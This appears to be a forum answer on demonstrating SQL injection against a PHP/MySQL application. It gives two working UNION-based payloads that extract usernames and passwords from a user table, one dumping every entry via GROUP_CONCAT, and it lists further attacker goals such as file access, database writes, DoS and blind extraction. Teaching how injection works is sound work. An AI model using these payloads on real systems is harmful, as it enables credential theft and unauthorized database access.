How to demonstrate SQL injection?

I'm assuming your using standard PHP mysql_query function in which case something like this would be effective in your example.

SELECT price FROM products WHERE 1=1 AND id=
999999999999999999999999 
UNION ALL 
(SELECT CONCAT(username, ' ', password) FROM user) limit 0, 1;

Explanation

  1. Use an ID of a product that is not going to exist.
  2. UNION with users table.
  3. SELECT a single column in the users table to return, as your only returning a single column from the product. In this case returning a concatenated field of the username and password columns.
  4. Limit by 1. As your code presumably expecting only a single result from query the query. You could alternatively use a WHERE condition to specify a specific user that you want to retrieve.

Another example would be to use group_concat this would allow for the retrieval of all the entries from the user table in a single query. Inspired from the answer on another question here.

SELECT price FROM products WHERE 1=1 AND id=-1 
UNION ALL 
(SELECT CONCAT(GROUP_CONCAT(username), '\n', GROUP_CONCAT(password)) FROM user);

Additional resources covering SQL Injection attacks:

  • SQL Injection from php manual
  • SQL Injection Cheat Sheet
  • SQL Injection Attacks by Example
  • xkcd: Exploits of a Mom

To your last question:

Alternatively, what else can I get the system to show?

Generally, it depends on how SQL server is configured and whether there are some mitigations present. But attacker may have will not only just to show user passwords, alternatively, he can try to:

  • read from and write to various files;
  • write to database and read from it;
  • make DoS and other harmful actions;

Each operation depends on several factors, like, how I said - the presence of mitigation factors, file permissions, system configuration, etc.

By the way, for attacker there is no need to show the result of SQL request. In the case when attacker cannot view the response, it makes the process of information extraction slower and harder, but not impossible.

If you are interested in, I would suggest you to read the blog of Bernardo Damele - the creator of sqlmap: http://bernardodamele.blogspot.com/. There are interesting presentations and reading on what can be done and how.